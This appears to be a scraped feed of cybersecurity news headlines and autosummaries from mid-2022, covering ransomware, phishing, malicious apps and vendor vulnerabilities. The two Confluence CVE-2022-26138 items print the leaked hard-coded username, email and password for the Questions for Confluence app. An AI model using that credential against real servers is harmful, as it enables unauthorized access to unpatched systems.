                Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.


                The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.

                "

                Autosummary: How to protect yourself from #scam robotexts: ▪️ Do not respond ▪️ Do not click on any links ▪️ Do not provide any info ▪️ File an FCC complaint ▪️ Forward unwanted texts to SPAM (7726) ▪️ Delete all suspicious texts — The FCC (@FCC) July 28, 2022 When you receive a spam text, do not engage with the sender. "


                State of cybersecurity funding in the first half of 2022

                government ciber
                2022-08-02 https://www.helpnetsecurity.com/2022/08/02/cybersecurity-funding-2022/

                As the stock market dropped more than 20% in 2022 and prices rise at the pump and grocery store, there are some markets that have shown their ability to weather the storm and retain strong demand and growth even amongst broader market turmoil. One example of this: the cybersecurity market. In the first half of 2022, the cybersecurity industry saw venture capital funding continue to pour into the space, according to Momentum Cyber’s Market Review … More

                The post State of cybersecurity funding in the first half of 2022 appeared first on Help Net Security.

                "

                Autosummary: Of the deals tracked, 37 raised more than $100 million and 14+ were put in the unicorn category, including Abnormal, Beyond Identity, JupiterOne, Material Security, Nord Security, Perimeter 81, Sonar, Teleport, and others. However, there were also seven more deals valued at more than $1B in the first half of 2022, including WatchGuard ($1.5B), Barracuda ($4B), Datto ($6.2B), Sailpoint ($6.9B), Mandiant ($5.3B) and others. "


                How AI and cybersecurity complement each other

                ciber
                2022-08-02 https://www.helpnetsecurity.com/2022/08/02/ai-cybersecurity-video/

                As the modern world evolves, more threats arise. Knowledge of cybersecurity and artificial intelligence (AI) has become crucial to a successful business. Businesses everywhere need true expertise to protect their data to avoid their competitors getting ahead. In this Help Net Security video, Taylor Hersom, CEO at Eden Data, discusses why we need AI and how it helps minimize human error, as well as cybersecurity threats such as ransomware.

                The post How AI and cybersecurity complement each other appeared first on Help Net Security.

                "

                Autosummary: "


                Gootkit AaaS malware is still active and uses updated tactics

                exploits industry
                2022-08-02 https://securityaffairs.co/wordpress/133918/malware/gootkit-is-still-active.html

                Gootkit access-as-a-service (AaaS) malware is back with updated tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-as-a-service model; it is used by different groups to drop additional malicious payloads on the compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt and REvil (Sodinokibi) ransomware, Kronos trojans, […]

                The post Gootkit AaaS malware is still active and uses updated tactics appeared first on Security Affairs.

                "

                Autosummary: “When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. "


                How to protect Windows 10 and 11 PCs from ransomware

                exploits ransomware
                2022-08-02 https://www.computerworld.com/article/3245585/how-to-protect-windows-10-from-ransomware.html#tk.rss_security

                CryptoLocker. WannaCry. DarkSide. Conti. MedusaLocker. The ransomware threat isn’t going away anytime soon; the news brings constant reports of new waves of this pernicious type of malware washing across the world. It’s popular in large part because of the immediate financial payoff for attackers: It works by encrypting the files on your hard disk, then demands that you pay a ransom, frequently in Bitcoin or other cryptocurrency, to decrypt them.

                But you needn’t be a victim. There’s plenty that Windows 10 and 11 users can do to protect themselves against it. In this article, I’ll show you how to keep yourself safe, including how to use an anti-ransomware tool built into Windows.


                "

                Autosummary: Most backup and storage services, including Microsoft OneDrive, Google Drive, Carbonite, Dropbox and many others, use versioning. They can use the Group Policy Management Console, the Windows Security Center, or PowerShell to turn on Controlled Folder Access for users on a network, customize which folders should be protected, and let additional applications access the folders beyond the Microsoft defaults. From the screen that appears, click Add an allowed app, navigate to the executable file of the program you want to add, click Open, and then confirm you want to add the file. If you decide at any point to remove a folder, get back to the “Protected folders” screen, click the folder you want to remove, and then click Remove. They can only decrypt data that’s been encrypted with certain specific pieces or families of ransomware, including REvil/Sodinokibi, DarkSide, MaMoCrypt, WannaRen and several others. In addition to Documents, Windows system folders include Desktop, Music, Pictures, and Videos. Hint: If you’re not sure where executable files are located for programs you want to add to the whitelist, look for the folder name with the program’s name in the Windows\Program Files or Windows\Program Files (x86) folders, then look for an executable file in that folder. As with adding folders to the list of protected folders, you can remove the app by getting back to this screen, clicking the application you want to remove, then clicking Remove. By default, the feature is not turned on, so if you want to protect yourself against ransomware, you’ll have to tell it to get to work. "


                “ParseThru” vulnerability allows unauthorized access to cloud-native applications

                exploits
                2022-08-02 https://www.helpnetsecurity.com/2022/08/02/parsethru-vulnerability/

                A new vulnerability found in GoLang-based applications allows a threat actor to bypass validations under certain conditions and gain unauthorized access to cloud-native applications, Oxeye researchers have found. The source of “ParseThru” – as the newly discovered vulnerability has been dubbed – is the use of unsafe URL parsing methods built in the language. About the “ParseThru” vulnerability GoLang is a popular cloud native programming language. It reduces the number of software development dependencies and … More

                The post “ParseThru” vulnerability allows unauthorized access to cloud-native applications appeared first on Help Net Security.

                "

                Autosummary: Three identified vulnerable projects include: CNCF-graduated project Harbor, an open source registry that secures artifacts with policies and role-based access control; Traefik, a modern HTTP reverse proxy and load balancer that makes deploying microservices easy; and Skipper, an HTTP router and reverse proxy for service composition. "


                New "ParseThru" Parameter Smuggling Vulnerability Affects Golang-based Applications

                exploits
                2022-08-02 https://thehackernews.com/2022/08/new-parsethru-parameter-smuggling.html
                Security researchers have discovered a new vulnerability called ParseThru affecting Golang-based applications that could be abused to gain unauthorized access to cloud-based applications. "The newly discovered vulnerability allows a threat actor to bypass validations under certain conditions, as a result of the use of unsafe URL parsing methods built in the language," Israeli cybersecurity firm "

                Autosummary: "


                What is ransomware and how can you defend your business from it?

                exploits ransomware
                2022-08-02 https://thehackernews.com/2022/08/what-is-ransomware-how-to-defend-your.html
                Ransomware is a kind of malware used by cybercriminals to stop users from accessing their systems or files; the cybercriminals then threaten to leak, destroy or withhold sensitive information unless a ransom is paid. Ransomware attacks can target either the data held on computer systems (known as locker ransomware) or devices (crypto-ransomware). In both instances, once a ransom is paid, threat "

                Autosummary: Oliver Pinson-Roxburgh, CEO of Defense.com, the all-in-one cybersecurity platform, shares knowledge and advice in this article on how ransomware works, how damaging it can be, and how your business can keep ransomware attacks from occurring. Exploiting vulnerable systems: Ransomware can also be deployed by exploiting unpatched and outdated systems, as was the case in 2017, when a security vulnerability in Microsoft Windows, EternalBlue (MS17-010), led to the global WannaCry ransomware attack that spread to over 150 countries. In summary: With ransomware groups continually looking for vulnerabilities to exploit, it's important that businesses develop robust strategies to prevent ransomware threats: ensure your staff takes regular security awareness training, set up threat monitoring tools to detect and alert you of vulnerabilities, and implement endpoint protection to protect your devices across your network. There are three key elements to a ransomware attack: Access: In order to deploy malware to encrypt files and gain control, cybercriminals need to initially gain access to an organization's systems. "


                LockBit Ransomware Abuses Windows Defender to Deploy Cobalt Strike Payload

                exploits ransomware
                2022-08-02 https://thehackernews.com/2022/08/lockbit-ransomware-abuses-windows.html
                A threat actor associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation has been observed abusing the Windows Defender command-line tool to decrypt and load Cobalt Strike payloads.  According to a report published by SentinelOne last week, the incident occurred after obtaining initial access via the Log4Shell vulnerability against an unpatched VMware Horizon Server. "Once initial "

                Autosummary: "Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike," researchers Julio Dantas, James Haughom, and Julien Reisdorffer said. "


                VMware urges admins to patch critical auth bypass bug immediately

                exploits
                2022-08-02 https://www.bleepingcomputer.com/news/security/vmware-urges-admins-to-patch-critical-auth-bypass-bug-immediately/
                VMware has warned admins today to patch a critical authentication bypass security flaw affecting local domain users in multiple products and enabling unauthenticated attackers to gain admin privileges. [...] "

                Autosummary: The company also patched multiple other security bugs enabling attackers to gain remote code execution (CVE-2022-31658, CVE-2022-31659, CVE-2022-31665) and escalate privileges to "root" (CVE-2022-31660, CVE-2022-31661, CVE-2022-31664) on unpatched servers. "


                LockBit 3.0 affiliate sideloads Cobalt Strike through Windows Defender

                ransomware
                2022-08-02 https://securityaffairs.co/wordpress/133925/cyber-crime/lockbit-3-0-abuse-windows-defender.html

                An affiliate of the LockBit 3.0 RaaS operation has been abusing the Windows Defender command-line tool to deploy Cobalt Strike payloads. During a recent investigation, SentinelOne researchers observed threat actors associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads. The attackers initially compromise the target […]

                The post LockBit 3.0 affiliate sideloads Cobalt Strike through Windows Defender appeared first on Security Affairs.



                Microsoft Defender now better at blocking ransomware on Windows 11

                exploits ransomware
                2022-08-02 https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-now-better-at-blocking-ransomware-on-windows-11/
                Microsoft has released new Windows 11 builds to the Beta Channel with improved Microsoft Defender for Endpoint ransomware attack blocking capabilities. [...]



                Semiconductor manufacturer Semikron hit by LV ransomware attack

                exploits ransomware industry
                2022-08-02 https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/
                German power electronics manufacturer Semikron has disclosed that it was hit by a ransomware attack that partially encrypted the company’s network. [...]



                Wolf in sheep’s clothing: how malware tricks users and antivirus

                exploits
                2022-08-02 https://www.bleepingcomputer.com/news/security/wolf-in-sheep-s-clothing-how-malware-tricks-users-and-antivirus/
                One of the primary methods used by malware distributors to infect devices is by deceiving people into downloading and running malicious files, and to achieve this deception, malware authors are using a variety of tricks. [...]

                Autosummary: Legitimate installers laced with malware (VirusTotal) Based on VirusTotal stats, this practice also appears to be on the rise this year, using Google Chrome, Malwarebytes, Windows Updates, Zoom, Brave, Firefox, ProtonVPN, and Telegram as lures.


                VMware fixed critical authentication bypass vulnerability

                exploits
                2022-08-02 https://securityaffairs.co/wordpress/133938/security/vmware-critical-flaws-3.html

                VMware patched a critical authentication bypass security flaw, tracked as CVE-2022-31656, impacting local domain users in multiple products. VMware has addressed a critical authentication bypass security flaw, tracked as CVE-2022-31656, impacting local domain users in multiple products. An unauthenticated attacker can exploit the vulnerability to gain admin privileges. “A malicious actor with network access to the […]

                The post VMware fixed critical authentication bypass vulnerability appeared first on Security Affairs.


                Autosummary: Remote Code Execution Vulnerability
                CVE-2022-31660 – Local Privilege Escalation Vulnerability
                CVE-2022-31661 – Local Privilege Escalation Vulnerability
                CVE-2022-31662 – Path traversal vulnerability
                CVE-2022-31663 – Cross-site scripting (XSS) vulnerability
                CVE-2022-31664 – Local Privilege Escalation Vulnerability
                CVE-2022-31665 – JDBC Injection Remote Code Execution Vulnerability
                The above issues impact the following products:
                VMware Workspace ONE Access (Access)
                VMware Workspace ONE Access Connector (Access Connector)
                VMware Identity Manager (vIDM)
                VMware Identity Manager Connector (vIDM Connector)


                Accenture acquires Tenbu to expand data and AI capabilities across the cloud continuum

                ransomware
                2022-08-02 https://www.helpnetsecurity.com/2022/08/03/accenture-tenbu/

                Accenture has acquired Tenbu. With more than 150 certifications, Tenbu’s team of 170 data specialists will join the Data & AI team within Accenture Cloud First. Terms of the acquisition were not disclosed. “Our goal is to help clients with total enterprise reinvention by building their digital core, optimizing operations and accelerating growth – and cloud data and AI are fundamental to a strong digital core,” said Karthik Narain, global lead for Accenture Cloud First. … More

                The post Accenture acquires Tenbu to expand data and AI capabilities across the cloud continuum appeared first on Help Net Security.



                Netskope acquires Infiot to provide users with optimized connections between any enterprise location

                industry
                2022-08-02 https://www.helpnetsecurity.com/2022/08/03/netskope-infiot/

                Netskope announced it has acquired Infiot, a pioneer in enabling secure access with zero trust security, network and application optimization, and AI-driven operations. As Netskope Borderless WAN, the addition of Infiot’s technology will enable Netskope customers to apply uniform security and quality of experience (QoE) policies to the widest range of hybrid work needs, from employees at home or on-the-go, to branch offices, ad-hoc point-of-sale systems, and multi-cloud environments. For customers, all of these capabilities … More

                The post Netskope acquires Infiot to provide users with optimized connections between any enterprise location appeared first on Help Net Security.


                Autosummary: Netskope Borderless WAN critical use cases include:
                Easy access to Netskope Intelligent SSE services powered by Netskope NewEdge infrastructure
                All-in-one intelligent access, routing, wireless WAN, network security, app assurance, and edge compute as an effective way to modernize, simplify and implement SASE architecture
                The ability to offload MPLS and eliminate costs by sending more traffic direct-to-net, eliminate backhauling and leverage fixed/mobile connectivity options (such as 4G/5G)
                Better guaranteed WAN connectivity to ensure end-to-end performance, from the “last mile” to the cloud or legacy data center
                Simplified operational overhead associated with running custom third-party applications
                “Today, leaders across IT, security, and networking and the world’s best-known analyst firms agree that the explosion of data and devices, along with the numerous ways that people connect, communicate, and collaborate, make the transformation of both networking and security a critical imperative for businesses and governments.
                Relevant to SASE growth, Gartner notes:
                “By 2024, 80% of SD-WAN deployments will incorporate SSE requirements, up from less than 25% in 2022”
                “By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s SSE platform”
                Despite SASE’s popularity, however, confusing vendor messaging often accompanies piecemeal product sets that are spuriously marketed as “SASE.”


                The most impersonated brand in phishing attacks? Microsoft

                financial
                2022-08-01 https://www.helpnetsecurity.com/2022/08/01/microsoft-brand-impersonation-phishing-attacks/

                Vade announced its H1 2022 Phishers’ Favorites report, a ranking of the top 25 most impersonated brands in phishing attacks. Microsoft came in at #1 on the list, followed by Facebook. Rounding out the top five are Crédit Agricole, WhatsApp, and Orange. Microsoft continues to be a top target for brand impersonation With 11,041 unique phishing URLs, Microsoft is the top target for brand impersonation. The popularity of Microsoft 365 among SMBs and enterprises has … More

                The post The most impersonated brand in phishing attacks? Microsoft appeared first on Help Net Security.


                Autosummary: Phishing attacks increased in Q1, then declined in Q2. According to the report, which you can read in full here, Q1 saw the most phishing attacks, with 81,447 unique phishing URLs detected, compared to 53,198 in Q2.


                Ransomware gangs are hitting roadblocks, but aren’t stopping (yet)

                exploits
                2022-08-01 https://www.helpnetsecurity.com/2022/08/01/ransomware-gangs-are-hitting-roadblocks/

                Ransomware attacks are in decline, according to reports by several cybersecurity companies. Why is that? More effort for less pay In its mid-year 2022 Cyber Threat Report, SonicWall notes that there has been a global 23% drop in ransomware, “as geopolitical forces, volatile cryptocurrency prices, and increased government and law-enforcement focus impacted both who cybercriminals chose to attack and how well they were capable of carrying out those attacks.” After witnessing many high-profile destructive attacks, … More

                The post Ransomware gangs are hitting roadblocks, but aren’t stopping (yet) appeared first on Help Net Security.


                Autosummary: More effort for less pay. In its mid-year 2022 Cyber Threat Report, SonicWall notes that there has been a global 23% drop in ransomware, “as geopolitical forces, volatile cryptocurrency prices, and increased government and law-enforcement focus impacted both who cybercriminals chose to attack and how well they were capable of carrying out those attacks.”


                Cyberattack prevention is cost-effective, so why aren’t businesses investing to protect?

                ciber
                2022-08-01 https://www.helpnetsecurity.com/2022/08/01/cyberattack-prevention-investing/

                Cyberattacks like ransomware, BEC scams and data breaches are some of the key issues businesses are facing today, but despite the number of high-profile incidents, many boardrooms are reluctant to free up budget to invest in the cybersecurity measures necessary to avoid becoming the next victim. In this Help Net Security interview, Former Pentagon Chief Strategy Officer Jonathan Reiber, VP Cybersecurity Strategy and Policy, AttackIQ, discusses how now, more than ever, companies need to protect … More

                The post Cyberattack prevention is cost-effective, so why aren’t businesses investing to protect? appeared first on Help Net Security.


                Autosummary: In this Help Net Security interview, Former Pentagon Chief Strategy Officer Jonathan Reiber, VP Cybersecurity Strategy and Policy, AttackIQ, discusses how now, more than ever, companies need to protect themselves from cyber threat actors. By adopting specialised frameworks to counteract cyber threats, for instance running a threat-informed defence and utilising automated platforms such as Breach-and-Attack Simulation (BAS), CISOs can continuously test and validate their systems. CISOs need to be aware of the current threat landscape: in a post-COVID world, remote work has opened a vault of new vulnerabilities, and the forward-thinking CISO of today needs to put in place preventative cybersecurity measures to manage the long-term risk to a company.


                US Federal Communications Commission (FCC) warns of the rise of smishing attacks

                financial
                2022-08-01 https://securityaffairs.co/wordpress/133865/cyber-crime/fcc-warns-smishing-attacks.html

                The Federal Communications Commission (FCC) warned Americans of the rising threat of smishing (robotexts) attacks. The Federal Communications Commission (FCC) issued an alert to warn Americans of the rising threat of smishing (robotexts) attacks aimed at stealing their personal information or for financial scams. “The FCC’s Robocall Response Team is alerting consumers to the rising […]

                The post US Federal Communications Commission (FCC) warns of the rise of smishing attacks appeared first on Security Affairs.



                BlackCat ransomware claims attack on European gas pipeline

                exploits ransomware
                2022-08-01 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-attack-on-european-gas-pipeline/
                The ransomware group known as ALPHV (aka BlackCat) has assumed over the weekend responsibility for the cyberattack that hit Creos Luxembourg last week, a natural gas pipeline and electricity network operator in the central European country. [...]

                Autosummary: BlackCat strikes gas again. The ALPHV/BlackCat ransomware group added Creos to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails.


                ALPHV/BlackCat ransomware gang claims to have stolen data from Creos Luxembourg S.A.

                exploits ransomware
                2022-08-01 https://securityaffairs.co/wordpress/133899/cyber-crime/alphv-blackcat-ransomware-creos-luxembourg.html

                The ALPHV/BlackCat ransomware gang claims to have breached the European gas pipeline Creos Luxembourg S.A. The ALPHV/BlackCat ransomware gang claims to have hacked the European gas pipeline Creos Luxembourg S.A. Creos Luxembourg S.A. owns and manages electricity networks and natural gas pipelines in the Grand Duchy of Luxembourg. In this capacity, the company plans, constructs […]

                The post ALPHV/BlackCat ransomware gang claims to have stolen data from Creos Luxembourg S.A. appeared first on Security Affairs.


                Autosummary: In this capacity, the company plans, constructs and maintains high, medium and low-voltage electricity networks and high, medium and low-pressure natural gas pipelines, which it owns or which it is responsible for managing. BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport.


                Resecurity partners with CFBD to mitigate risk for Peruvian enterprises

                latam
                2022-08-01 https://www.helpnetsecurity.com/2022/08/02/resecurity-cfbd/

                Resecurity partners with CFBD to expand Resecurity’s AI-driven cybersecurity solutions and services to Peru. As Peru’s digital economy expands, cyber threats are increasingly prominent, with 32% of organizations in Peru suffering cyber-attacks from 2018-2020. Compounding these threats, Peru’s organizations face the challenges of limited security talent, early-stage digitalism, and access to cybersecurity solutions that help organizations mitigate risk and automate security workflows. To accelerate the implementation of AI-powered cybersecurity and threat intelligence in Peru, Resecurity … More

                The post Resecurity partners with CFBD to mitigate risk for Peruvian enterprises appeared first on Help Net Security.



                Week in review: Attackers abandoning malicious macros, average data breach cost soars

                financial
                2022-07-31 https://www.helpnetsecurity.com/2022/07/31/week-in-review-attackers-abandoning-malicious-macros-average-data-breach-cost-soars/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Israel’s new cyber-kinetic lab will boost the resilience of critical infrastructure In a building under construction at the Advanced Technologies Park in Be’er Sheva, the “cyber capital” of Israel, a new governmental lab is also taking shape: the National Cyber-Kinetic Lab for ICS and OT. Attackers are slowly abandoning malicious macros Malicious macro-enabled documents as vehicles for email-based malware delivery … More

                The post Week in review: Attackers abandoning malicious macros, average data breach cost soars appeared first on Help Net Security.


                Autosummary: New infosec products of the week: July 29, 2022. Here’s a look at the most interesting products from the past week, featuring releases from Aqua Security, NetApp, Rapid7, Runecast, and Teleport. The future of attack surface management (ASM): In this Help Net Security video, David Monnier, Team Cymru Fellow, talks about what lies ahead for attack surface management, the findings from the recent State of Attack Surface Management report, and offers advice for security leaders evaluating existing or potential ASM platforms.


                17 Android Apps on Google Play Store, dubbed DawDropper, were serving banking malware

                financial exploits
                2022-07-31 https://securityaffairs.co/wordpress/133853/malware/dawdropper-apps-google-play.html

                The researchers discovered over a dozen Android apps on the Google Play Store, collectively dubbed DawDropper, that were dropping banking malware. Trend Micro researchers uncovered a malicious campaign that leveraged 17 seemingly harmless Android dropper apps, collectively tracked as DawDropper, on the Google Play Store to distribute banking malware. The DawDropper apps masqueraded as productivity and utility apps such […]

                The post 17 Android Apps on Google Play Store, dubbed DawDropper, were serving banking malware appeared first on Security Affairs.


                Autosummary:
                Call Recorder APK (com.caduta.aisevsk)
                Rooster VPN (com.vpntool.androidweb)
                Super Cleaner- hyper & smart (com.j2ca.callrecorder)
                Document Scanner – PDF Creator (com.codeword.docscann)
                Universal Saver Pro (com.virtualapps.universalsaver)
                Eagle photo editor (com.techmediapro.photoediting)
                Call recorder pro+ (com.chestudio.callrecorder)
                Extra Cleaner (com.casualplay.leadbro)
                Crypto Utils (com.utilsmycrypto.mainer)
                FixCleaner (com.cleaner.fixgate)
                Just In: Video Motion (com.olivia.openpuremind)
                com.myunique.sequencestore
                com.flowmysequto.yamer
                com.qaz.universalsaver
                Lucky Cleaner (com.luckyg.cleaner)
                Simpli Cleaner (com.scando.qukscanner)
                Unicc QR Scanner (com.qrdscannerratedx)
                “Cybercriminals are constantly finding ways to evade detection and infect as many devices as possible.


                Threat actor claims to have hacked European manufacturer of missiles MBDA

                industry
                2022-07-31 https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html

                Threat actors that go online with the moniker Adrastea claim to have hacked the multinational missile manufacturer MBDA. MBDA is a European multinational developer and manufacturer of missiles that resulted from the merger of the main French, British and Italian missile systems companies (Aérospatiale–Matra, BAE Systems, and Finmeccanica (now Leonardo)). The name MBDA is an initialism of the names of the missile companies Matra, BAe Dynamics and Alenia. A threat actor […]

                The post Threat actor claims to have hacked European manufacturer of missiles MBDA appeared first on Security Affairs.


                Autosummary: “The downloaded data contains confidential and closed information about the employees of your company, which took part in the development of closed military projects of MBDA (PLANCTON, CRONOS, CA SIRIUS, EMADS, MCDS, B1NT etc.) and about the commercial activities of your company in the interests of the Ministry of Defense of the European Union (design documentation of the air defense, missile systems and systems of coastal protection, drawings, presentation, video and photo (3D) materials, contract agreements and correspondence with other companies Rampini Carlo, Netcomgroup, Rafael, Thales, ST Electronics etc.).”


                CISA Warns of Atlassian Confluence Hard-Coded Credential Bug Exploited in Attacks

                exploits
                2022-07-30 https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added the recently disclosed Atlassian security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The vulnerability, tracked as CVE-2022-26138, concerns the use of hard-coded credentials when the Questions For Confluence app is enabled in Confluence Server and Data Center



                Reading the “ENISA THREAT LANDSCAPE FOR RANSOMWARE ATTACKS” report

                exploits ransomware
                2022-07-30 https://securityaffairs.co/wordpress/133827/malware/enisa-threat-landscape-for-ransomware-attacks.html

                I’m proud to announce the release of the “ENISA THREAT LANDSCAPE FOR RANSOMWARE ATTACKS” report, Enjoy it! Ransomware has become one of the most dangerous threats for organizations worldwide. Cybercriminal organizations and ransomware gangs have devised new business models that are attracting a broad range of advanced threat actors. It is quite easy today for […]

                The post Reading the “ENISA THREAT LANDSCAPE FOR RANSOMWARE ATTACKS” report appeared first on Security Affairs.



                CISA orders to patch an actively exploited flaw in Confluence servers

                exploits
                2022-07-30 https://securityaffairs.co/wordpress/133819/security/cisa-confluence-cve-2022-26138-catalog.html

                The US Cybersecurity and Infrastructure Security Agency (CISA) has added the critical Confluence flaw, tracked as CVE-2022-26138, to its Known Exploited Vulnerabilities Catalog. US CISA has added the recently disclosed Confluence vulnerability, tracked as CVE-2022-26138, to its list of bugs abused in the wild, a flaw that can provide remote attackers with hardcoded credentials following successful exploitation. According to Binding Operational Directive (BOD) […]

                The post CISA orders to patch an actively exploited flaw in Confluence servers appeared first on Security Affairs.


                Autosummary: CVE-2022-26138 Default Atlassian Confluence password has been leaked – Username disabledsystemuser – Email dontdeletethisuser@email.com – Password disabled1system1user6708 Update Questions for Confluence app ver


                Spanish Police Arrest 2 Nuclear Power Workers for Cyberattacking the Radiation Alert System

                ciber
                2022-07-29 https://thehackernews.com/2022/07/spanish-police-arrest-2-nuclear-power.html
                Spanish law enforcement officials have announced the arrest of two individuals in connection with a cyberattack on the country’s radioactivity alert network (RAR), which took place between March and June 2021. The act of sabotage is said to have disabled more than one-third of the sensors that are maintained by the Directorate-General for Civil Protection and Emergencies (DGPCE) and used to



                Latest Critical Atlassian Confluence Vulnerability Under Active Exploitation

                exploits
                2022-07-29 https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html
                A week after Atlassian rolled out patches to contain a critical flaw in its Questions For Confluence app for Confluence Server and Confluence Data Center, the shortcoming has now come under active exploitation in the wild. The bug in question is CVE-2022-26138, which concerns the use of a hard-coded password in the app that could be exploited by a remote, unauthenticated attacker to gain



                Microsoft links Raspberry Robin malware to Evil Corp attacks

                exploits
                2022-07-29 https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-malware-to-evil-corp-attacks/
                Microsoft has discovered that an access broker it tracks as DEV-0206 uses the Raspberry Robin Windows worm to deploy a malware downloader on networks where it also found evidence of malicious activity matching Evil Corp tactics. [...]



                Romance scammers jailed after tricking Irish OAP out of €250k

                financial
                2022-07-29 https://www.bitdefender.com/blog/hotforsecurity/romance-scammers-jailed-after-tricking-irish-oap-out-of-eu250k/
                An Irish court has jailed three romance scammers who tricked a 66-year-old woman out of her life savings, and even tricked her into visiting Dubai at her own expense. Read more in my article on the Hot for Security blog.

                Autosummary: The three men - Omowale Owolabi, 31, of Navan Co Meath, 32-year-old Raak Sami Sadu, of Clonsilla, Dublin, and Samson Ajayi, 33, of Grangerath, Co Meath - admitted their involvement in the fraudulent scheme where they created a fake profile in the name of "Neil Turner" on the Plenty of Fish website.


                Ransomware looms large over the cyber insurance industry

                exploits industry
                2022-07-29 https://www.helpnetsecurity.com/2022/07/29/ransomware-cyber-insurance-video/

                A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. This Help Net Security video highlights how the increasing cost of ransomware affects global insurers.

                The post Ransomware looms large over the cyber insurance industry appeared first on Help Net Security.



                Dahua IP Camera Vulnerability Could Let Attackers Take Full Control Over Devices

                exploits
                2022-07-29 https://thehackernews.com/2022/07/dahua-ip-camera-vulnerability-could-let.html
                Details have been shared about a security vulnerability in Dahua’s Open Network Video Interface Forum (ONVIF) standard implementation, which, when exploited, can lead to seizing control of IP cameras. Tracked as CVE-2022-30563 (CVSS score: 7.4), the "vulnerability could be abused by attackers to compromise network cameras by sniffing a previous unencrypted ONVIF interaction and replaying the



                Researchers Warn of Increase in Phishing Attacks Using Decentralized IPFS Network

                financial
                2022-07-29 https://thehackernews.com/2022/07/researchers-warns-of-increase-in.html
                The decentralized file system solution known as IPFS is becoming the new "hotbed" for hosting phishing sites, researchers have warned. Cybersecurity firm Trustwave SpiderLabs, which disclosed specifics of the attack campaigns, said it identified no less than 3,000 emails containing IPFS phishing URLs as an attack vector in the last three months. IPFS, short for InterPlanetary File System, is a

                Autosummary: Indeed, researchers from IronNet took the wraps off a large-scale campaign utilizing a four-month-old PhaaS platform dubbed Robin Banks to plunder credentials and steal financial information from customers of well-known banks in Australia, Canada, the U.K., and the U.S. "While the primary motivation for scammers using this kit appears to be financial, the kit does also ask victims for their Google and Microsoft credentials after they travel to the phishing landing page, indicating it could also be used by more advanced threat actors looking to gain initial access to corporate networks for ransomware or other post-intrusion activities," the researchers said.


                Exploitation is underway for a critical flaw in Atlassian Confluence Server and Data Center

                exploits
                2022-07-29 https://securityaffairs.co/wordpress/133798/hacking/atlassian-cve-2022-26138-actively-exploited.html

                Threat actors are actively exploiting the recently patched critical flaw in Atlassian Confluence Server and Data Center. Recently Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center, tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed, the Questions […]

                The post Exploitation is underway for a critical flaw in Atlassian Confluence Server and Data Center appeared first on Security Affairs.


                Autosummary: CVE-2022-26138 Default Atlassian Confluence password has been leaked – Username disabledsystemuser – Email dontdeletethisuser@email.com – Password disabled1system1user6708 Update Questions for Confluence app ver


                Malware-laced npm packages used to target Discord users

                exploits
                2022-07-29 https://securityaffairs.co/wordpress/133795/cyber-crime/malware-npm-packages-discord.html

                Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals their payment card information, Kaspersky researchers warn. The malicious code hidden in the packages, and tracked as Lofy Stealer, is a […]

                The post Malware-laced npm packages used to target Discord users appeared first on Security Affairs.



                US govt warns Americans of escalating SMS phishing attacks

                financial
                2022-07-29 https://www.bleepingcomputer.com/news/security/us-govt-warns-americans-of-escalating-sms-phishing-attacks/
                The Federal Communications Commission (FCC) warned Americans of an increasing wave of SMS (Short Message Service) phishing attacks attempting to steal their personal information and money. [...]

                Autosummary: "The FCC tracks consumer complaints – rather than call or text volume – and complaints about unwanted text messages have risen steadily in recent years from approximately 5,700 in 2019, 14,000 in 2020, 15,300 in 2021, to 8,500 through June 30, 2022," the US communications watchdog’s Robocall Response Team said [PDF].


                LockBit operator abuses Windows Defender to load Cobalt Strike

                ransomware
                2022-07-29 https://www.bleepingcomputer.com/news/security/lockbit-operator-abuses-windows-defender-to-load-cobalt-strike/
                Security analysts have observed an affiliate of the LockBit 3.0 ransomware operation abusing a Windows Defender command line tool to decrypt and load Cobalt Strike beacons on the target systems. [...]



                Over a Dozen Android Apps on Google Play Store Caught Dropping Banking Malware

                financial exploits
                2022-07-29 https://thehackernews.com/2022/07/over-dozen-android-apps-on-google-play.html
                A malicious campaign leveraged seemingly innocuous Android dropper apps on the Google Play Store to compromise users’ devices with banking malware. These 17 dropper apps, collectively dubbed DawDropper by Trend Micro, masqueraded as productivity and utility apps such as document scanners, QR code readers, VPN services, and call recorders, among others. All these apps in question have been



                Microsoft experts linked the Raspberry Robin malware to Evil Corp operation

                exploits
                2022-07-29 https://securityaffairs.co/wordpress/133810/cyber-crime/raspberry-robin-linked-evil-corp.html

